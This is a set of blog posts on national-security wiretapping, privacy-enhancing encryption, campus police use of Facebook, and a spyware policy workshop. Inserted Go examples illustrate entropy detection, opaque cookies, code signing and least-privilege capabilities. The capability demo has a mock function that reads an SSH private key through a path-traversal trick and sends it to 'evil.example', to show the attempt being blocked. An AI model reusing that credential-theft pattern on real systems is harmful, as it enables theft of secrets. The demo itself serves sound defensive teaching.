November 23, 2024

Twenty-First Century Wiretapping: Recording

Yesterday I started a thread on new wiretapping technologies, and their policy implications. Today I want to talk about how we should deal with the ability of governments to record and store huge numbers of intercepted messages.

In the old days, before there were huge, cheap digital storage devices, government would record an intercepted message only if it was likely to listen to that message eventually. Human analysts’ time was scarce, but recording media were relatively scarce too. The cost of storage tended to limit the amount of recording.

Before too much longer, Moore’s Law will enable government to record every email and phone call it knows about, and to keep the recordings forever. The cost of storage will no longer be a factor. Indeed, if storage is free but analysts’ time is costly, then the cost-minimizing strategy is to record everything and sort it out later, rather than spending analyst time figuring out what to record. Cost is minimized by doing lots of recording.

Of course the government’s cost is not the only criterion that wiretap policy should consider. We also need to consider the effect on citizens.

Any nontrivial wiretap policy will sometimes eavesdrop on innocent citizens. Indeed, there is a plausible argument that a well-designed wiretap policy will mostly eavesdrop on innocent citizens. If we knew in advance, with certainty, that a particular communication would be part of a terrorist plot, then of course we would let government listen to that communication. But such certainty only exists in hypotheticals. In practice, the best we can hope for is that, based on the best available information, there is some known probability that the message will be part of a terrorist plot. If that probability is just barely less than 100%, we’ll be comfortable allowing eavesdropping on that message. If the probability is infinitesimal, we won’t allow eavesdropping. Somewhere in the middle there is a threshold probability, just high enough that we’re willing to allow eavesdropping. We’ll make the decision by weighing the potential benefit of hearing the bad guys’ conversations, against the costs and harms imposed by wiretapping, in light of the probability that we’ll overhear real bad guys. The key point here is that even the best wiretap policy will sometimes listen in on innocent people.

(For now, I’m assuming that “we” have access to the best possible information, so that “we” can make these decisions. In practice the relevant information may be closely held (perhaps with good reason) and it matters greatly who does the deciding. I know these issues are important. But please humor me and let me set them aside for a bit longer.)

The drawbacks of wiretapping come in several flavors:
(1) Cost: Wiretapping costs money.
(2) Mission Creep: The scope of wiretapping programs (arguably) tends to increase over time, so today’s reasonable, well-balanced program will lead to tomorrow’s overreach.
(3) Abuse: Wiretaps can be (and have been) misused, by improperly spying on innocent people such as political opponents of the wiretappers, and by misusing information gleaned from wiretaps.
(4) Privacy Threat: Ordinary citizens will feel less comfortable and will feel compelled to speak more cautiously, due to the knowledge that wiretappers might be listening.

Cheap, high-capacity storage reduces the first drawback (cost) but increases all the others. The risk of abuse seems particularly serious. If government stores everything from now on, corrupt government officials, especially a few years down the road, will have tremendous power to peer into the lives of people they don’t like.

This risk is reason enough to insist that recording be limited, and that there be procedural safeguards against overzealous recording. What limits and safeguards are appropriate? That’s the topic of my next post.

Twenty-First Century Wiretapping

The revelation that the National Security Agency has been wiretapping communications crossing the U.S. border (and possibly within the U.S.), without warrants, has started many angry conversations across the country, and rightly so. Here is an issue that challenges our most basic conception of the purposes of government and its relation to citizens.

Today I am starting a series of posts about this issue. Most discussions of the wiretap program focus on two questions: (1) Is the program legal? and (2) Regardless of its legality, does the program, as currently executed, serve our national interest (bearing in mind the national interest in both national security and citizens’ privacy)? These questions are surely important, but I want to set them aside here. I’m setting aside the legal question because it’s outside my expertise. I’m setting aside any evaluation of the current program for two reasons. First, we don’t know the exact scope of the current wiretap program. Second, most people – on both sides – think the second question is an easy one, and easy questions lead to boring conversations.

I want to focus instead on the more basic questions of what the extent of national security wiretapping should be, and why. The why question is especially important.

The first thing to realize is that this is not your parents’ wiretap debate. Though the use (and sometimes misuse) of wiretapping has long been a contentious issue, the terms of the debate have changed. I’m not referring here to the claim that 9/11 changed everything. What I mean is that wiretapping technology has changed in ways that ought to reframe the debate.

Two technology changes are important. The first is the dramatic drop in the cost of storage, making it economical to record vast amounts of communications traffic. The second technology change is the use of computer algorithms to analyze intercepted communications. Traditionally, a wiretap would be heard (or read) immediately by a person, or recorded for later listening by a person. Today computer algorithms can sift through intercepted communications, looking for sophisticated patterns, and can select certain items to be recorded or heard by a person.

Both changes are driven by Moore’s Law, the rule of thumb that the capability of digital technologies doubles every eighteen months or, equivalently, improves by a factor of 100 every ten years. This means that in 2016 government will be able to store 100 times more intercepted messages, and will be able to devote 100 times more computing capability to its analysis algorithms, compared to today. If the new world of wiretapping has not entirely arrived, it will be here before long.

So government will have greater eavesdropping capabilities and, more interestingly, it will have different capabilities. How should we respond? Surely it is not right simply to let government do whatever it wants – this has never been our policy. Nor can it be right to let government do no wiretapping at all – this has not been our policy either. What we need to understand is where to draw the line, and what kind of oversight and safeguards we need to keep our government near the line we have drawn. I hope that the next several posts can shed some small amount of light on these questions.

Guns vs. Random Bits

Last week Tim Wu gave an interesting lecture here at Princeton – the first in our infotech policy lecture series – entitled “Who Controls the Internet?”, based on his recent book of the same title, co-authored with Jack Goldsmith. In the talk, Tim argued that national governments will have a larger role than most people think, for good or ill, in the development and use of digital technologies.

Governments have always derived power from their ability to use force against their citizens. Despite claims that digital technologies would disempower government, Tim argued that it is now becoming clear that governments have the same sort of power they have always had. He argued that technology doesn’t open borders as widely as you might think.

An illustrative example is the Great Firewall of China. The Chinese government has put in place technologies to block their citizens’ access to certain information and to monitor their citizens’ communications. There are privacy-enhancing technologies that could give Chinese citizens access to the open Web and allow them to communicate privately. For example, they could encrypt all of their Internet traffic and pass it through a chain of intermediaries, so that all the government monitors saw was a stream of encrypted bits.

Such technologies work as a technical matter, but they don’t provide much comfort in practice, because people know that using such technologies – conspicuously trafficking in encrypted data – could lead to a visit from the police. Guns trump ciphers.

At the end of the lecture, Tim Lee (who happened to be in town) asked an important question: how much do civil liberties change this equation? If government can arbitrarily punish citizens, then it can deter the use of privacy-enhancing technologies. But are limits on government power, such as the presumption of innocence and limits on search and seizure, enough to turn the tables in practice?

From a technology standpoint, the key issue is whether citizens have the right to send and receive random (or random-looking) bits, without being compelled to explain what they are really doing. Any kind of private or anonymous communication can be packaged, via encryption, to look like random bits, so the right to communicate random bits (plus the right to use a programmable computer to pre- and post-process messages) gives people the ability to communicate out of the view of government.
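To make the “random bits” point concrete, here is an added example (mine, not part of the original post or of Tim Wu’s book) that plays both sides of the Great Firewall scenario above. The citizen encrypts a message with a counter-mode stream cipher; the monitor, which never sees the key, measures the byte entropy of what passes and flags anything close to 8 bits per byte. The key, nonce, message text and the 7.0 bits/byte threshold are all constructed for the demonstration; the keystream construction (HMAC-SHA256 in counter mode) is a textbook one used only so the code runs on the standard library, not a recommendation for real traffic.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
	"math"
	"strings"
)

// keystreamXOR XORs msg with a keystream of HMAC-SHA256(key, nonce||counter)
// blocks: a textbook counter-mode stream cipher built from the standard
// library so the example runs anywhere. The same call decrypts.
func keystreamXOR(key, nonce, msg []byte) []byte {
	out := make([]byte, len(msg))
	var ctr [8]byte
	for off := 0; off < len(msg); off += sha256.Size {
		binary.BigEndian.PutUint64(ctr[:], uint64(off/sha256.Size))
		mac := hmac.New(sha256.New, key)
		mac.Write(nonce)
		mac.Write(ctr[:])
		block := mac.Sum(nil)
		for j := 0; j < sha256.Size && off+j < len(msg); j++ {
			out[off+j] = msg[off+j] ^ block[j]
		}
	}
	return out
}

// ShannonEntropy returns the bits of entropy per byte (0..8) of a sample.
// English text sits around 4 to 5; encrypted or compressed bytes sit near 8.
func ShannonEntropy(sample []byte) float64 {
	if len(sample) == 0 {
		return 0
	}
	var counts [256]int
	for _, b := range sample {
		counts[b]++
	}
	n := float64(len(sample))
	h := 0.0
	for _, c := range counts {
		if c == 0 {
			continue
		}
		p := float64(c) / n
		h -= p * math.Log2(p)
	}
	return h
}

// LooksRandom is the monitor's rule: it cannot read the flow, but it can
// tell that the flow is not plaintext, which is all the post says it needs.
func LooksRandom(sample []byte, threshold float64) bool {
	return ShannonEntropy(sample) >= threshold
}

// SamplePlaintext is a constructed stand-in for an unencrypted message:
// 4 KB of ordinary English.
func SamplePlaintext() []byte {
	line := "Meet me at the usual place at nine; bring the documents and tell nobody. "
	return []byte(strings.Repeat(line, 4096/len(line)+1)[:4096])
}

func main() {
	// Constructed key and nonce for the demonstration only.
	key := []byte("demo-key-32-bytes-not-for-real!!")
	nonce := []byte("demo-nonce")
	pt := SamplePlaintext()
	ct := keystreamXOR(key, nonce, pt)
	fmt.Printf("plaintext : %.2f bits/byte, flagged=%v\n", ShannonEntropy(pt), LooksRandom(pt, 7.0))
	fmt.Printf("ciphertext: %.2f bits/byte, flagged=%v\n", ShannonEntropy(ct), LooksRandom(ct, 7.0))
	// Only the key holder can reverse the XOR and recover the message.
	fmt.Println("round trip ok:", string(keystreamXOR(key, nonce, ct)) == string(pt))
}
```

Two things the run shows. First, the ciphertext is indistinguishable from random bytes by this measure, so the content is out of the monitor’s reach; the same is true of the traffic between any two hops of the chain of intermediaries described above, since each hop sees only the outer layer. Second, that is exactly why it is conspicuous: the monitor does not need to break the cipher, only to notice that a flow is not plaintext, and a regime that can knock on doors can act on that alone. Compressed media scores high on the same test, so the rule flags “not plaintext” rather than “encrypted”, and making encrypted traffic look like something innocuous is a much harder problem than encrypting it.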

My sense is that civil liberties, including the right to communicate random bits, go a long way in empowering citizens to communicate out of the view of government. It stands to reason that people who are more free offline will tend to be more free online as well.

Which raises another question that Tim Wu didn’t have time to address at any length: can a repressive country walk the tightrope by retaining control over its citizens’ access to political information and debate, while giving them enough autonomy online to reap the economic benefits of the Net? Tim hinted that he thought the answer might be yes. I’m looking forward to reading “Who Controls the Internet?” to see more discussion of this point.

Facebook and the Campus Cops

An interesting mini-controversy developed at Princeton last week over the use of the Facebook.com web site by Princeton’s Public Safety officers (i.e., the campus police).

If you’re not familiar with Facebook, you must not be spending much time on a college campus. Facebook is a sort of social networking site for college students, faculty and staff (but mostly students). You can set up a home page with your picture and other information about you. You can make links to your friends’ pages, by mutual consent. You can post photos on your page. You can post comments on your friends’ pages. You can form groups based on some shared interest, and people can join the groups.

The controversy started with a story in the Daily Princetonian revealing that Public Safety had used Facebook in two investigations. In one case, a student’s friend posted a photo of the student that was taken during a party in the student’s room. The photo reportedly showed the student hosting a dorm-room party where alcohol was served, which is a violation of campus rules. In another case, there was a group of students who liked to climb up the sides of buildings on campus. They had set up a building-climbers’ group on Facebook, and Public Safety reportedly used the group to identify the group’s members, so as to have Serious Discussions with them.

Some students reacted with outrage, seeing this as an invasion of privacy and an unfair tactic by Public Safety. I find this reaction really interesting.

Students who stop to think about how Facebook works will realize that it’s not very private. Anybody with a princeton.edu email address can get an account on the Princeton Facebook site and view pages. That’s a large group, including current students, alumni, faculty, and staff. (Public Safety officers are staff members.)

And yet students seem to think of Facebook as somehow private, and they continue to post lots of private information on the site. A few weeks ago, I surfed around the site at random. Within two or three minutes I spotted Student A’s page saying, in a matter of fact way, that Student A had recently slept with Student B. Student B’s page confirmed this event, and described what it was like. Look around on the site and you’ll see many descriptions of private activities, indiscretions, and rule-breaking.

I have to admit that I find this pretty hard to understand. Regular readers of this blog know that I reveal almost nothing about my personal life. If you have read carefully over the last three and a half years, you have learned that I live in the Princeton area, am married, and have at least one child (of unspecified age(s)). Not exactly tabloid material. Some bloggers say more – a lot more – but I am more comfortable this way. Anyway, if I did write about my personal life, I would expect that everybody in the world would find out what I wrote, assuming they cared.

It’s easy to see why Public Safety might be interested in reading Facebook, and why students might want to keep Public Safety away. In the end, Public Safety stated that it would not hunt around randomly on Facebook, but it would continue to use Facebook as a tool in specific investigations. Many people consider this a reasonable compromise. It feels right to me, though I can’t quite articulate why.

Expect this to become an issue on other campuses too.

NYU/Princeton Spyware Workshop Liveblog

Today I’m at the NYU/Princeton spyware workshop. I’ll be liveblogging the workshop here. I won’t give you copious notes on what each speaker says, just a list of things that strike me as interesting. Videos of the presentations will be available on the net eventually.

I gave a basic tutorial on spyware last night, to kick off the workshop.

The first panel today is officially about the nature of the spyware problem, but it’s shaping up as the law enforcement panel. The first speaker is Mark Eckenwiler from the U.S. Department of Justice. He is summarizing the various Federal statutes that can be used against spyware purveyors, including statutes against wiretapping and computer intrusions. One issue I hadn’t heard before involves how to prove that a particular spyware purveyor caused harm, if the victim’s computer was also infected with lots of other spyware from other sources.

Second speaker is Eileen Harrington of the Federal Trade Commission. The FTC has two main roles here: to enforce laws, especially relating to unfair and deceptive business practices, and to run hearings and study issues. In 1995 the FTC ran a series of hearings on online consumer protection, which identified privacy as important but didn’t identify spam or spyware. In recent years their focus has shifted more toward spyware. FTC enforcement is based on three principles: the computer belongs to the consumer; disclosure can’t be buried in a EULA; and software must be reasonably removable. These seem sensible to me. She recommends a consumer education website created by the FTC and other government agencies.

Third speaker is Justin Brookman of the New York Attorney General’s office. To them, consent is the biggest issue. He is skeptical of state spyware laws, saying they are often too narrow and require a high level of intent to be proven for civil liability. Instead, they enforce based on laws against deceptive business practices and false advertising, and on trespass to chattels. They focus on the consumer experience, and don’t always need to dig very deeply into all of the technical details. He says music lyric sites are often spyware-laden. In one case, a screen saver came with a 188-page EULA, which mentioned the included adware on page 131. He raises the issue of when companies are responsible for what their “affiliates” do.

Final speaker of the first panel is Ari Schwartz of CDT, who runs the Anti-Spyware Coalition. ASC is a big coalition of public-interest groups, companies, and others to build consensus around a definition of spyware and principles for dealing with it. The definition problem is both harder and more important than you might think. The goal was to create a broadly accepted definition, to short-circuit debates about whether particular pieces of unpleasant software are or are not spyware. He says that many of the harms caused by software are well addressed by existing law (identity theft, extortion, corporate espionage, etc.), but general privacy invasions are not. In what looks like a recurring theme for the workshop, he talks about how spyware purveyors use intermediaries (“affiliates”) to create plausible deniability. He shows a hair-raising chain of emails obtained in discovery in an FTC case against Sanford Wallace and associates. This was apparently an extortion-type scheme, where extreme spyware was locked on to a user’s computer, and the antidote was sold to users for $30.

Question to the panel about what happens if the perpetrator is overseas. Eileen Harrington says that if there are money flows, they can freeze assets or sometimes get money repatriated from overseas. The FTC wants statutory changes to foster information exchange with other governments. Ari Schwartz says advertisers, ad agencies, and adware makers are mostly in the U.S. Distribution of software is sometimes from the U.S., sometimes from Eastern Europe, former Soviet Union, or Asia.

Q&A discussion of how spyware programs attack each other. Justin Brookman talks about a case where one spyware company sued another spyware company over this.

The second panel is on “motives, incentives, and causes”. It’s two engineers and two lawyers. First is Eric Allred, an engineer from Microsoft’s antispyware group. “Why is this going on? For the money.”

Eric talks about game programs that use spyware tactics to fight cheating code, e.g. the “warden” in World of Warcraft. He talks about products that check quality of service or performance provided by, e.g., network software, by tracking some behaviors. He thinks this is okay with adequate notice and consent.

He takes a poll of the room. Only a few people admit to having their machines infected by spyware – I’ll bet people are underreporting. Most people say that friends have caught spyware.

Second speaker is Markus Jakobsson, an engineer from Indiana University and RavenWhite. He is interested in phishing and pharming, and the means by which sites can gather information about you. As a demonstration, he says his home page tells you where you do your online banking.

He describes an experiment they did that simulated phishing against IU students. Lots of people fell for it. Interestingly, people with political views on the far left or far right were more likely to fall for it than people with more moderate views. The experimental subjects were really mad (but the experiment had proper institutional review board approval).

“My conclusion is that user education does not work.”

Third is Paul Ohm, a law professor at Colorado. He was previously a prosecutor at the DOJ. He talks about the “myth of the superuser”. (I would have said “superattacker”.) He argues that Internet crime policy is wrongly aimed to stop the superuser.

What happens? Congress writes prohibitions that are broad and vague. Prosecutors and civil litigants use the broad language to pursue novel theories. Innocent people get swept in.

He conjectures that most spyware purveyors aren’t technological superusers. In general, he argues that legislation should focus on non-superuser methods and harms.

He talks about the SPYBLOCK Act language, which bans certain actions, if done with certain bad intent. “The FBI agent stops reading after the list of actions.”

Fourth is Marc Rotenberg from EPIC. His talk is structured as a list of observations, presented in random order. I’ll repeat some of them here. (1) People tend to behave opportunistically online – extract information if you can. (2) “Spyware is a crime of architectural opportunity.” (3) Motivations for spyware: money, control, exploitation, investigation.

He argues that cookies are spyware. This is a controversial view. He argues for reimagining cookies or how users can control them.

Q&A session begins. Alex asks Paul Ohm whether it makes sense in the long run to focus on attackers who aren’t super, given that attackers can adapt. Paul says, first, that he hopes technologists will help stop the superattackers. (The myth of the super-defender?) He advocates a more incremental and adaptive approach to drafting the statutes; aim at the 80% case, then adjust every few years.

Question to Marc Rotenberg about what can be done about cookies. Marc says that originally cookies contained, legibly, the information they represented, such as your zip code. But before long cookies morphed into unique identifiers, opaque to the user. Eric Allred points out that the cookies can be strongly, cryptographically opaque to users.
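Here is an added example (mine, not from the workshop or the original post) of the three generations of cookie just described: a legible value the user can read and edit, an opaque identifier that merely indexes a profile kept server-side, and the cryptographically opaque version, where an HMAC tag lets the server detect any edit the user makes. The server secret, the profile fields and the cookie layout “id.tag” are constructed for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Profile is what the site actually knows about a visitor. With an opaque
// cookie this never leaves the server; the cookie is only a handle to it.
type Profile struct{ Zip, Interests string }

// Tracker stands in for an ad server. Key and profiles are constructed.
type Tracker struct {
	key      []byte
	profiles map[string]Profile
}

func NewTracker(key []byte) *Tracker {
	return &Tracker{key: key, profiles: map[string]Profile{}}
}

// LegibleCookie is the early style: the value is the data, readable and
// editable by anyone who opens the cookie file.
func LegibleCookie(p Profile) string { return "zip=" + p.Zip }

// tag is what makes the cookie cryptographically opaque: the user can see
// the bytes but cannot learn what they index or alter them undetected.
func (t *Tracker) tag(id string) string {
	m := hmac.New(sha256.New, t.key)
	m.Write([]byte(id))
	return hex.EncodeToString(m.Sum(nil))
}

// Issue mints a random identifier, files the profile under it server-side,
// and returns the cookie value "id.tag".
func (t *Tracker) Issue(p Profile) (string, error) {
	raw := make([]byte, 16)
	if _, err := rand.Read(raw); err != nil {
		return "", err
	}
	id := hex.EncodeToString(raw)
	t.profiles[id] = p
	return id + "." + t.tag(id), nil
}

var ErrBadCookie = errors.New("cookie malformed or tampered")

// Resolve verifies the tag in constant time, then looks the identifier up.
func (t *Tracker) Resolve(cookie string) (Profile, error) {
	parts := strings.SplitN(cookie, ".", 2)
	if len(parts) != 2 || !hmac.Equal([]byte(parts[1]), []byte(t.tag(parts[0]))) {
		return Profile{}, ErrBadCookie
	}
	p, found := t.profiles[parts[0]]
	if !found {
		return Profile{}, ErrBadCookie
	}
	return p, nil
}

// Tampered flips the first character of the identifier, as a user editing
// the cookie by hand might.
func Tampered(cookie string) string {
	if cookie == "" {
		return "x"
	}
	c := []byte(cookie)
	if c[0] == '0' {
		c[0] = '1'
	} else {
		c[0] = '0'
	}
	return string(c)
}

func main() {
	tr := NewTracker([]byte("constructed-server-secret"))
	p := Profile{Zip: "08540", Interests: "building-climbing"}
	fmt.Println("legible:", LegibleCookie(p))
	c, err := tr.Issue(p)
	if err != nil {
		panic(err)
	}
	fmt.Println("opaque :", c)
	got, err := tr.Resolve(c)
	fmt.Println("server resolves to:", got, err)
	_, err = tr.Resolve(Tampered(c))
	fmt.Println("edited cookie:", err)
}
```

The asymmetry is the point: with the legible cookie the user could see, and change, what the site recorded; with the tagged opaque one the server regains full control of both the data and the identifier, and the user is left holding a random string that is meaningful only to the party that issued it.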

The final session is on solutions. Ben Edelman speaks first. He shows a series of examples of unsavory practices, relating to installation without full consent and to revenue sources for adware.

He shows a scenario where a NetFlix popup ad appears when a user visits blockbuster.com. This happened through a series of intermediaries – seven HTTP redirects – to pop up the ad. Netflix paid LinkShare, LinkShare paid Azoogle, Azoogle paid MyGeek, and MyGeek paid DirectRevenue. He’s got lots of examples like this, from different mainstream ad services.

He shows an example of Google AdSense ads popping up in 180solutions adware popup windows. He says he found 4600+ URLs where this happened (as of last June).

Orin Kerr speaks next. “The purpose of my talk is to suggest that there are no good ways for the law to handle the spyware problem.” He suggests that technical solutions are a better idea. A pattern today: lawyers want to rely more on technical solutions, technologists want to rely more on law.

He says criminal law works best when the person being prosecuted is clearly evil, even to a juror who doesn’t understand much about what happened. He says that spyware purveyors more often operate in a hazy gray area – so criminal prosecution doesn’t look like the right tool.

He says civil suits by private parties may not work, because defendants don’t have deep enough pockets to make serious suits worthwhile.

He says civil suits by government (e.g., the FTC) may not work, because they have weaker investigative powers than criminal investigators, especially against fly-by-night companies.

It seems to me that his arguments mostly rely on the shady, elusive nature of spyware companies. Civil actions may work against large companies that portray themselves as legitimate. So they may have the benefit of driving spyware vendors underground, which could make it harder for them to sell to some advertisers.

Ira Rubinstein of Microsoft is next. His title is “Code Signing As a Spyware Solution”. He describes (the 64-bit version of) Windows Vista, which will require any kernel-mode software to be digitally signed. This is aimed to stop rootkits and other kernel-mode exploits. It sounds quite similar to Authenticode, Microsoft’s longstanding signing infrastructure for ActiveX controls.
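To show what the loader in such a scheme actually decides, here is an added example (mine; it is not Microsoft’s code and does not reproduce the Vista or Authenticode formats). A loader holds a trust list of public keys, hashes the module image, and refuses anything unsigned, signed by a key outside the list, or whose bytes no longer match the signature. Ed25519 stands in for the real certificate chain; the module names, the “vendor” and “rogue” keys and the image bytes are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Module stands in for a kernel-mode binary with the detached signature and
// signer key that a real loader would pull from the image's certificate.
type Module struct {
	Name   string
	Code   []byte
	Signer ed25519.PublicKey
	Sig    []byte
}

var (
	ErrUnsigned        = errors.New("module carries no signature")
	ErrUntrustedSigner = errors.New("signer is not in the kernel trust list")
	ErrBadSignature    = errors.New("signature does not verify over the module image")
)

// LoadPolicy is the loader's trust list: only these keys may sign kernel code.
type LoadPolicy struct{ trusted map[string]bool }

func NewLoadPolicy(keys ...ed25519.PublicKey) *LoadPolicy {
	p := &LoadPolicy{trusted: map[string]bool{}}
	for _, k := range keys {
		p.trusted[string(k)] = true
	}
	return p
}

// imageDigest is the hash both signer and loader compute over the image.
func imageDigest(code []byte) []byte {
	h := sha256.Sum256(code)
	return h[:]
}

// SignModule produces the detached signature a vendor would ship.
func SignModule(priv ed25519.PrivateKey, code []byte) []byte {
	return ed25519.Sign(priv, imageDigest(code))
}

// CheckLoad is the rule described in the talk: unsigned or untrusted kernel
// code is refused, and so is code whose signature no longer matches its bytes.
func (p *LoadPolicy) CheckLoad(m Module) error {
	if len(m.Sig) == 0 {
		return ErrUnsigned
	}
	if !p.trusted[string(m.Signer)] {
		return ErrUntrustedSigner
	}
	if !ed25519.Verify(m.Signer, imageDigest(m.Code), m.Sig) {
		return ErrBadSignature
	}
	return nil
}

// Scenarios builds one trusted vendor key and one rogue key and runs the
// loader over the cases a practitioner cares about, returning each verdict.
func Scenarios() (map[string]error, error) {
	vendorPub, vendorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	roguePub, roguePriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	policy := NewLoadPolicy(vendorPub)
	driver := []byte("constructed driver image bytes v1.0")
	vendorSig := SignModule(vendorPriv, driver)

	tampered := append([]byte{}, driver...)
	tampered[len(tampered)-1] ^= 0x01 // one bit flipped after signing

	cases := map[string]Module{
		"vendor-signed":          {Name: "good.sys", Code: driver, Signer: vendorPub, Sig: vendorSig},
		"unsigned":               {Name: "legacy.sys", Code: driver},
		"rogue-signed":           {Name: "rootkit.sys", Code: driver, Signer: roguePub, Sig: SignModule(roguePriv, driver)},
		"rogue-forging-vendor":   {Name: "rootkit2.sys", Code: driver, Signer: vendorPub, Sig: SignModule(roguePriv, driver)},
		"tampered-after-signing": {Name: "patched.sys", Code: tampered, Signer: vendorPub, Sig: vendorSig},
	}
	out := map[string]error{}
	for name, m := range cases {
		out[name] = policy.CheckLoad(m)
	}
	return out, nil
}

func main() {
	results, err := Scenarios()
	if err != nil {
		panic(err)
	}
	for name, verdict := range results {
		if verdict == nil {
			fmt.Printf("%-24s LOAD\n", name)
		} else {
			fmt.Printf("%-24s REFUSE: %v\n", name, verdict)
		}
	}
}
```

The check proves origin and integrity, nothing more: a module signed by a key on the trust list loads whether or not its behaviour is benign, so the scheme is only as strong as the trust list and the custody of the vendors’ signing keys, and it needs a way to revoke a key once it leaks. That is the gap between “stops unsigned rootkits” and “stops rootkits”.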

Mark Miller of HP is the last speaker. His talk starts with an End-User Listening Agreement, in which everyone in the audience must agree that he can read our minds and redistribute what he learns. He says that we’re not concerned about this because it’s infeasible for him to install hostile code into our brains.

He points out that the Solitaire program has the power to read, analyze or transmit any data on the computer. Any other program can do the same. He argues that we need to obey the principle of least privilege. It seems to me that we already have all the tools to do this, but people don’t do it.

He shows an example of how to stop a browser from leaking your secrets, by either not letting it connect to the Net, or not letting it read any local files. But even a simple browser needs to do both. This is not a convincing demo.
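As an added illustration (mine, not Miller’s demo and not part of the original post) of the least-privilege principle the previous paragraphs discuss: rather than giving a browser all of the file system or none of it, and all of the network or none of it, hand it attenuated capabilities, a reader confined to its cache directory and a connector confined to the site being visited. The browser still gets both, as it must, yet a hostile or compromised browser cannot read a key and ship it elsewhere. File contents, paths and hostnames (`bank.example`, `evil.example`) are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

// A component can only do what it is handed; these two interfaces are the
// only authority the browser receives.
type FileReader interface{ Read(p string) (string, error) }
type Connector interface{ Send(host, payload string) error }

var ErrDenied = errors.New("capability does not cover this request")

// ambientFS and ambientNet stand in for the full file system and network that
// a conventional program gets for free. Contents are constructed.
type ambientFS map[string]string

func (f ambientFS) Read(p string) (string, error) {
	if s, ok := f[path.Clean(p)]; ok {
		return s, nil
	}
	return "", errors.New("no such file")
}

type ambientNet struct{ sent []string }

func (n *ambientNet) Send(host, payload string) error {
	n.sent = append(n.sent, host+": "+payload)
	return nil
}

// Attenuators wrap a capability into a narrower one. Paths are cleaned before
// the prefix check so "/cache/../home" cannot walk out of the allowed tree.
type underDir struct {
	dir   string
	inner FileReader
}

func (u underDir) Read(p string) (string, error) {
	clean := path.Clean(p)
	if !strings.HasPrefix(clean, u.dir+"/") {
		return "", ErrDenied
	}
	return u.inner.Read(clean)
}

type onlyHost struct {
	host  string
	inner Connector
}

func (o onlyHost) Send(host, payload string) error {
	if host != o.host {
		return ErrDenied
	}
	return o.inner.Send(host, payload)
}

// Browser needs both a reader and a connector to do its job; the question is
// how much of each.
type Browser struct {
	fs  FileReader
	net Connector
}

// PostCachedForm is legitimate work: read a cached page, post it to the site.
func (b Browser) PostCachedForm(site string) error {
	form, err := b.fs.Read("/cache/form.html")
	if err != nil {
		return err
	}
	return b.net.Send(site, form)
}

// Exfiltrate is what a hostile or compromised browser tries: read a secret
// through a path that escapes the cache, then ship it to an attacker's host.
func (b Browser) Exfiltrate() error {
	key, err := b.fs.Read("/cache/../home/alice/.ssh/id_rsa")
	if err != nil {
		return err
	}
	return b.net.Send("evil.example", key)
}

// Scenario runs both actions with full or attenuated authority and reports
// the two errors and everything that reached the network.
func Scenario(attenuated bool) (postErr, exfilErr error, sent []string) {
	fs := ambientFS{
		"/cache/form.html":        "<form>constructed cached page</form>",
		"/home/alice/.ssh/id_rsa": "constructed private key material",
	}
	net := &ambientNet{}
	b := Browser{fs: fs, net: net}
	if attenuated {
		b = Browser{fs: underDir{dir: "/cache", inner: fs}, net: onlyHost{host: "bank.example", inner: net}}
	}
	postErr = b.PostCachedForm("bank.example")
	exfilErr = b.Exfiltrate()
	return postErr, exfilErr, net.sent
}

func main() {
	for _, att := range []bool{false, true} {
		p, e, sent := Scenario(att)
		fmt.Printf("attenuated=%v post=%v exfil=%v sent=%q\n", att, p, e, sent)
	}
}
```

With full authority both actions succeed and the key leaves the machine; with the attenuated pair the legitimate post still works, the read of the key is refused by the directory attenuator, and even if it had succeeded the host attenuator would refuse the connection. Nothing in the underlying file system or network changed; only what the browser was handed did.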

In the Q&A, Ben Edelman recommends Eric Howes’s web site as a list of which antispyware tools are legit and which are bogus or dangerous.

Orin Kerr is asked whether we should just give up on using the law. He says no, we should use the law to chip away at the problem, but we shouldn’t expect it to solve the problem entirely. Justin Brookman challenges Orin, saying that civil subpoena power seems to work for Justin’s group at the NY AG office. Orin backtracks slightly but sticks to his basic point that spyware vendors will adapt or evolve into forms more resistant to enforcement.

Alex asks Orin how law and technology might work together to attack the problem. Orin says he doesn’t see a grand solution, just incremental chipping away at the problem. Ira Rubinstein says that law can adjust incentives, to foster adoption of better technology approaches.

And our day draws to a close. All in all, it was a very interesting and thought-provoking discussion. I wish it had been longer – which I rarely say at the end of this kind of event.